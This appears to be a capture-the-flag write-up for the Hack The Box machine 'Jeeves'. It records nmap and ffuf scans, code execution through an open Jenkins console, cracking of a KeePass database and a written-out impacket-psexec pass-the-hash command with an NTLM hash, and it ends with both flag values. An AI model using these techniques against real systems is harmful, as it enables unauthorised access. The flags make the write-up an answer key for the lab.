Setup
mkdir -p ~/ctf/HackTheBox/jeeves/scans; cd ~/ctf/HackTheBox/jeeves
IP Address: 10.10.10.63
echo "10.10.10.63 jeeves.htb" | sudo tee -a /etc/hosts
10.10.10.63 jeeves.htb
Enumeration
nmap -sC -sV -Pn -p- jeeves.htb -oN scans/nmap -vv
nmap -sC -sV -p- -T5 -vv --min-rate 2500 -oN scans/nmap_2 jeeves.htb
# nmap findings
PORT STATE SERVICE REASON VERSION
80/tcp open http syn-ack ttl 127 Microsoft IIS httpd 10.0
|_http-title: Ask Jeeves
|_http-server-header: Microsoft-IIS/10.0
| http-methods:
| Supported Methods: OPTIONS TRACE GET HEAD POST
|_ Potentially risky methods: TRACE
135/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
445/tcp open microsoft-ds syn-ack ttl 127 Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
50000/tcp open http syn-ack ttl 127 Jetty 9.4.z-SNAPSHOT
|_http-server-header: Jetty(9.4.z-SNAPSHOT)
|_http-title: Error 404 Not Found
Service Info: Host: JEEVES; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 4h36m57s, deviation: 0s, median: 4h36m57s
| smb-security-mode:
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-time:
| date: 2025-07-10T21:55:52
|_ start_date: 2025-07-09T13:45:29
| p2p-conficker:
| Checking for Conficker.C or higher...
| Check 1 (port 55172/tcp): CLEAN (Timeout)
| Check 2 (port 10973/tcp): CLEAN (Timeout)
| Check 3 (port 48293/udp): CLEAN (Timeout)
| Check 4 (port 58629/udp): CLEAN (Timeout)
|_ 0/4 checks are positive: Host is CLEAN or ports are blocked
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
ffuf -r -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt:ff -u http://jeeves.htb/ff -o scans/ffuf_dir
# FFUF dir search findings
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v2.1.0-dev
________________________________________________
:: Method : GET
:: URL : http://jeeves.htb:50000/ff
:: Wordlist : ff: /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
:: Output file : scans/ffuf_dir
:: File format : json
:: Follow redirects : true
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________
askjeeves [Status: 200, Size: 13399, Words: 585, Lines: 18, Duration: 7430ms]
So the main port 80 is the main website and 50000 port host’s the jenkins for CI/CD.
on jeeves.htb:50000/askjeeves we see an unrestriced jenkins where we can create projects to execute arbitary commands and even run groovy script in jenkins
Using https://www.revshells.com/ we generate a groovy script to get a reverse shell
User Flag
Location: C:\Users\kohsuke\Desktop\user.txt | Flag: e3232272596fb47950d59c4cf1e7066a
Privilege Escalation
We find a Keepass DB in the Documents folder of the user kohsuke
Using impacket-smbserver share . -smb2support we open a smb share using which we can easily transfer files between box and host. Now on the reverse shell we connect to our smb server and then copy the file
using keepass2john CEH.kdbx > hash we first extract the hash for the DB, then crack the password using the john and rockyou wordlist.
using KeeWeb we open our Keepass DB
in Backup Stuff we have an hash e0fb1fb85756c24235ff238cbe81fe00 which when tried with username administrator works
Using impacket-psexec -hashes aad3b435b51404eeaad3b435b51404ee:e0fb1fb85756c24235ff238cbe81fe00 -target-ip 10.10.10.63 administrator@jeeves.htb we get a shell
there is a file hm.txt which says to look deeper for flag
when check with dir /r ( which is used to check for alternate stream of data) we see the root.txt
Root Flag
Location: C:\Users\Administrator\Desktop | Flag: afbc5bd4b615a60648cec41c6ac92530